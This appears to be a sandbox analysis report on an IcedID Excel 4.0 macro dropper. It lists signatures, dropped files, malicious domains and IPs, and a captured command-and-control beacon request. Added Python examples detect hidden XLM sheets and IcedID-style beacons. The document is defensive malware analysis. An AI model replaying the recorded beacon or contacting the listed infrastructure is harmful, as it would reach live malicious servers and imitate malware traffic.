Analysis Report document-1915351743.xls

Overview

General Information

Sample Name: document-1915351743.xls
Analysis ID: 356250
MD5: 976d437fbf1c1598413411d366092cb6
SHA1: ab1c382ec0a25bd9881eee9a3401c9e1b78ee4e5
SHA256: 21944a6a3c05598d1cdc6893c982e22d81344ff8bc8225811691512976aa6bcc
Tags: SilentBuilderxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Yara detected hidden Macro 4.0 in Excel
Adds / modifies Windows certificates
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match
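The signatures above flag a hidden, abnormally large Excel 4.0 (XLM) macro sheet. In a BIFF8 .xls file each sheet is announced by a BOUNDSHEET record in the Workbook stream, and that record carries both the sheet type (worksheet, XLM macro sheet, chart, VBA module) and its visibility (visible, hidden, or "very hidden", which cannot be unhidden from the Excel UI). The following Python is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own detection code: it walks a BIFF record stream, decodes BOUNDSHEET records per the [MS-XLS] BoundSheet8 layout, and returns every macro sheet that is not visible. The input stream is constructed inline (a BOF stub, one visible worksheet, one very-hidden XLM sheet, EOF); the sheet names and stream offsets in it are invented for the test vector.

```python
from __future__ import annotations
import struct
from dataclasses import dataclass

BOUNDSHEET = 0x0085  # BIFF record type for BoundSheet8
BOF, EOF = 0x0809, 0x000A

# BoundSheet8.hsState ([MS-XLS] 2.4.28): 0 visible, 1 hidden, 2 very hidden
HS_STATE = {0: "visible", 1: "hidden", 2: "very hidden"}
# BoundSheet8.dt: 0x00 worksheet/dialog, 0x01 Excel 4.0 macro sheet, 0x02 chart, 0x06 VBA module
SHEET_TYPE = {0x00: "worksheet", 0x01: "macro sheet (XLM)", 0x02: "chart", 0x06: "VBA module"}


@dataclass
class Sheet:
    name: str
    state: str
    kind: str
    stream_offset: int  # lbPlyPos: offset of the sheet substream's BOF in the Workbook stream


def iter_records(data: bytes):
    """Yield (record_type, payload) for a BIFF record stream; stops cleanly on truncation."""
    off = 0
    while off + 4 <= len(data):
        rtype, size = struct.unpack_from("<HH", data, off)
        off += 4
        yield rtype, data[off:off + size]
        off += size


def parse_boundsheet(payload: bytes) -> Sheet:
    """Decode BoundSheet8: lbPlyPos(4) | hsState+unused(1) | dt(1) | ShortXLUnicodeString."""
    pos, grbit, dt, cch, flags = struct.unpack_from("<IBBBB", payload, 0)
    raw = payload[8:]
    # fHighByte (bit 0 of flags) selects UTF-16LE characters, otherwise 8-bit characters
    name = raw[:cch * 2].decode("utf-16-le") if flags & 1 else raw[:cch].decode("latin-1")
    return Sheet(
        name=name,
        state=HS_STATE.get(grbit & 0x03, "unknown"),
        kind=SHEET_TYPE.get(dt, f"unknown(0x{dt:02x})"),
        stream_offset=pos,
    )


def list_sheets(workbook_stream: bytes) -> list[Sheet]:
    return [parse_boundsheet(p) for t, p in iter_records(workbook_stream) if t == BOUNDSHEET]


def find_hidden_xlm_sheets(workbook_stream: bytes) -> list[Sheet]:
    """Macro sheets that are hidden or very hidden: the XLM dropper pattern flagged in the report."""
    return [s for s in list_sheets(workbook_stream)
            if s.kind.startswith("macro") and s.state != "visible"]


def build_boundsheet(name: str, state: int, dt: int, pos: int) -> bytes:
    """Test-vector builder (constructed here; 8-bit sheet name, no Unicode flag)."""
    body = struct.pack("<IBB", pos, state, dt) + struct.pack("<BB", len(name), 0) + name.encode("latin-1")
    return struct.pack("<HH", BOUNDSHEET, len(body)) + body


# Constructed Workbook-stream fragment: BOF stub, visible worksheet, very-hidden XLM sheet, EOF.
SAMPLE_STREAM = (
    struct.pack("<HH", BOF, 16) + bytes(16)
    + build_boundsheet("Sheet1", 0, 0x00, 0x100)
    + build_boundsheet("Macro1", 2, 0x01, 0x400)   # hsState=2 (very hidden), dt=1 (XLM)
    + struct.pack("<HH", EOF, 0)
)

if __name__ == "__main__":
    for s in list_sheets(SAMPLE_STREAM):
        print(f"{s.name:10} {s.kind:20} {s.state:12} @0x{s.stream_offset:x}")
    print("hidden XLM sheets:", [s.name for s in find_hidden_xlm_sheets(SAMPLE_STREAM)])
```

On a real .xls the Workbook stream must first be pulled out of the OLE2 container (for example with olefile's `OleFileIO(path).openstream("Workbook").read()`); the record walk above then runs unchanged. A visible XLM sheet is still worth triaging, but a macro sheet marked very hidden (state 2) has no legitimate reason to exist in a document that asks the user to enable content.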

Classification

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif ReversingLabs: Detection: 41%
Source: C:\Users\user\idefje.ekfd ReversingLabs: Detection: 41%
Yara detected IcedID
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2324, type: MEMORY
Source: Yara match File source: 3.2.rundll32.exe.7feea7c0000.10.unpack, type: UNPACKEDPE

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 143.204.4.74:443 -> 192.168.2.22:49167 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 197.242.147.47:443 -> 192.168.2.22:49165 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 1802[1].gif.0.dr Jump to dropped file
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: miraclecollagen.co.za
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 197.242.147.47:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 197.242.147.47:443

Networking:

HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
GET / HTTP/1.1
Connection: Keep-Alive
Cookie: __gads=620514333:1:5267:49; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=373833383735:416C627573; __io=0; _gid=67AFEDC5AC03
Host: oskolko.uno
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 143.204.4.74:443 -> 192.168.2.22:49167 version: TLS 1.0
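The beaconing GET to oskolko.uno recorded above carries no User-Agent header and a Cookie header whose six names (__gads, _gat, _ga, _u, __io, _gid) imitate Google Analytics cookies; the _u value is two colon-separated hex strings. The following Python is an added example, not part of the Joe Sandbox report: it parses such a request, flags the missing User-Agent together with that exact cookie set, and hex-decodes _u. The sample request is constructed from the header values captured above. Treating this six-name cookie layout as an IcedID indicator, and reading _u as hex-encoded host and user identifiers, follows public IcedID write-ups and is an assumption here rather than a finding of this report; the decoded tokens are therefore returned as-is.

```python
from dataclasses import dataclass

# Cookie names in the captured beacon. Using this exact set as an IcedID
# indicator is the detection assumption of this example (public write-ups
# describe IcedID's fake-Google-Analytics cookie layout this way).
ICEDID_COOKIE_KEYS = {"__gads", "_gat", "_ga", "_u", "__io", "_gid"}

# Constructed from the request recorded in this report (one header per line).
SAMPLE_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Cookie: __gads=620514333:1:5267:49; _gat=6.1.7601.64; _ga=1.329303.0.5; "
    "_u=373833383735:416C627573; __io=0; _gid=67AFEDC5AC03\r\n"
    "Host: oskolko.uno\r\n\r\n"
)


@dataclass
class BeaconVerdict:
    host: str
    missing_user_agent: bool
    cookie_keys: set
    matches_icedid_layout: bool
    decoded_u: tuple   # hex-decoded tokens of _u; their meaning is an assumption (see lead-in)
    os_like_field: str  # _gat as captured; it reads like a Windows version string


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (request line, {lowercased header: value})."""
    head, _, _ = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        if key:
            headers[key.strip().lower()] = value.strip()
    return lines[0], headers


def parse_cookie(value: str) -> dict:
    """'a=1; b=2' -> {'a': '1', 'b': '2'}; tolerates empty segments."""
    out = {}
    for part in value.split(";"):
        key, _, val = part.strip().partition("=")
        if key:
            out[key] = val
    return out


def decode_hex_tokens(value: str) -> tuple:
    """Decode 'hex:hex' into ASCII tokens; returns () if any token is not clean hex ASCII."""
    try:
        return tuple(bytes.fromhex(p).decode("ascii") for p in value.split(":") if p)
    except (ValueError, UnicodeDecodeError):
        return ()


def analyse(raw: str) -> BeaconVerdict:
    _, headers = parse_request(raw)
    cookies = parse_cookie(headers.get("cookie", ""))
    keys = set(cookies)
    no_ua = "user-agent" not in headers
    return BeaconVerdict(
        host=headers.get("host", ""),
        missing_user_agent=no_ua,
        cookie_keys=keys,
        # Both conditions together: the cookie layout alone could collide with real
        # analytics traffic, but real browsers always send a User-Agent.
        matches_icedid_layout=no_ua and keys == ICEDID_COOKIE_KEYS,
        decoded_u=decode_hex_tokens(cookies.get("_u", "")),
        os_like_field=cookies.get("_gat", ""),
    )


if __name__ == "__main__":
    v = analyse(SAMPLE_REQUEST)
    print(v.host, "UA missing:", v.missing_user_agent, "IcedID layout:", v.matches_icedid_layout)
    print("_u decodes to:", v.decoded_u, "| _gat:", v.os_like_field)
```

For the captured beacon the _u field decodes to the two ASCII tokens "783875" and "Albus", and _gat is "6.1.7601.64", which reads like a Windows 6.1 build 7601 (Windows 7 SP1) version string and is consistent with the Office14-on-Windows-7 environment visible in the file paths. The 404 reply to this beacon, recorded further down, carries a "Server: nginx" header while its body is an Apache-branded default error page; that mismatch is worth recording alongside the cookie layout when writing response-side matches for this infrastructure.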
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ Jump to behavior
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: miraclecollagen.co.za
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 19:13:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 31 30 39 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6f 73 6b 6f 6c 6b 6f 2e 75 6e 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii (chunked body; "109" is the chunk length in hex, "0" the terminating chunk): 109<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at oskolko.uno Port 80</address></body></html>0
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
Source: idefje.ekfd.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
Source: idefje.ekfd.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://o.ss2.us/0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.rootg2.amazontrust.com08
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.sca1b.amazontrust.com06
Source: idefje.ekfd.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://oskolko.uno/om/
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://s.ss2.us/r.crl0
Source: rundll32.exe, 00000003.00000002.2129883264.0000000002DA0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2129883264.0000000002DA0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://x.ss2.us/x.cer0&
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.34/js
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.63
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.373
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.373/style-awsm.css
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logo
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra/1.0.373/directories
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra/1.0.373/libra-cardsui
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra/1.0.373/libra-head.js
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra/1.0.373/librastandardlib
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.107/plc
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/psf/null
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/target/1.0.112/aws-target-mediator.js
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: https://amazon.com/Y
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2128397366.0000000000379000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/?nc2=h_lg
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/ar/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/cn/
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/de/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/es/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/fr/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/id/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/it/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/jp/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/ko/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
